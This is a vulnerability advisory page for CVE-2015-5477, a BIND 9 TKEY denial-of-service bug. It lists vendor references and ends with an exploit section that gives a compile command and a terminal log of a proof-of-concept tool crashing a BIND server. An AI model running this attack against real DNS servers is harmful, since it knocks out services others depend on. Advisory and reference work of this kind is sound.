Vulnonym.com

CVE-2015-5477 - Dividual Boxes

Description

named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.

Reference

https://kb.isc.org/article/AA-01272 http://www.debian.org/security/2015/dsa-3319 http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00048.html http://rhn.redhat.com/errata/RHSA-2015-1515.html http://rhn.redhat.com/errata/RHSA-2015-1513.html http://rhn.redhat.com/errata/RHSA-2015-1514.html http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00044.html http://lists.opensuse.org/opensuse-security-announce/2015-08/msg00001.html http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00045.html http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00043.html http://www.ubuntu.com/usn/USN-2693-1 http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00050.html https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05095918 http://marc.info/?l=bugtraq&m=144181171013996&w=2 http://marc.info/?l=bugtraq&m=144000632319155&w=2 http://marc.info/?l=bugtraq&m=144294073801304&w=2 http://marc.info/?l=bugtraq&m=144017354030745&w=2 http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html http://www.securityfocus.com/bid/76092 http://rhn.redhat.com/errata/RHSA-2016-0078.html http://rhn.redhat.com/errata/RHSA-2016-0079.html http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10718 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04952480 http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00033.html https://kb.isc.org/article/AA-01306 https://security.gentoo.org/glsa/201510-01 https://kc.mcafee.com/corporate/index?page=content&id=SB10126 https://kb.isc.org/article/AA-01305 https://kb.isc.org/article/AA-01307 https://support.apple.com/kb/HT205032 https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04789415 https://www.exploit-db.com/exploits/37723/ http://www.securitytracker.com/id/1033100 http://packetstormsecurity.com/files/132926/BIND-TKEY-Query-Denial-Of-Service.html http://lists.fedoraproject.org/pipermail/package-announce/2015-August/163015.html http://lists.fedoraproject.org/pipermail/package-announce/2015-August/163007.html http://lists.fedoraproject.org/pipermail/package-announce/2015-August/163006.html https://kb.isc.org/article/AA-01438 https://kb.juniper.net/JSA10783 https://www.exploit-db.com/exploits/37721/ https://security.netapp.com/advisory/ntap-20160114-0001/

Exploit

PoC for BOND9 TKEY assert DoS (CVE-2015-5477)

This exploit tests to see if a BIND9 server is vulnerable by sending the exploit in order to see if it crashes.

It’s C code that you compile the normal way on Unix/Window, such as:

# gcc tkill.c -o tkill

It’ll run over both IPv4 and IPv6.

This is what it looks like running against localhost. Since it gets two IP addresses resolving the name, it’ll try both of them. It first queries the “version” string, then sends the exploit. When it probes the second address, the version query fails because the service is already crashed from the first attempt.

root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed